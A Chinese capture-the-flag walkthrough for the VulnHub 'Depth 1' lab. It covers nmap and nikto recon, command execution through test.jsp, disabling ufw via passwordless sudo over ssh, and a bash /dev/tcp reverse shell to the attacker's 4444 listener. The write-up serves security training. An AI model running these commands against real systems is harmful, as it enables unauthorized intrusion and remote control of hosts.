环境准备
靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/
使用Vmware虚拟机中NAT网络
靶机: 192.168.146.153
攻击机 parrot 192.168.146.129
提示:以下是本篇文章正文内容,下面案例可供参考
一、信息搜集
1、nmap扫描
-A全面扫描
-p-全端口扫描
nmap -A -p- 192.168.146.153
发现只有开放了8080端口
浏览一下8080端口
2、使用nikto扫描网站目录
nikto 是一款用来发现 web 应用程序漏洞的一个工具,常用于对web网页服务器进行全面的多种扫描
利用nikto扫描该站点8080端口
nikto -h http://192.168.146.153:8080
发现一个敏感目录👇test.jsp
点进去访问
可能存在远程命令执行漏洞
【至此本靶机的信息搜集基本完成】
二、漏洞利用测试
uname -a
成功获取操作系统信息,有回显
查看home目录下的用户
ls -la /home
发现bill这个用户👇
继续深入刺探
ls -la /home/bill
考虑是否开启了ssh服务
查看进程
ps -aux
发现确实开启了ssh服务,但是之前信息搜集阶段nmap没用扫到,猜测可能有防火墙
在/etc/目录中发现防火墙
利用ssh执行root权限命令查看回显是否可以使用
补:sudo -l 列出超级用户可执行与无法执行的指令
ssh bill@localhost sudo -l
成功↓
接着关闭防火墙
ssh bill@localhost sudo ufw disable
三、nc反弹shell
parrot上先开启4444号端口监听
nc -lvp 4444
利用命令执行漏洞进行nc连接
ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.146.129/4444 0>&1
nc成功反弹shell
拿到flag值
完成,收工😄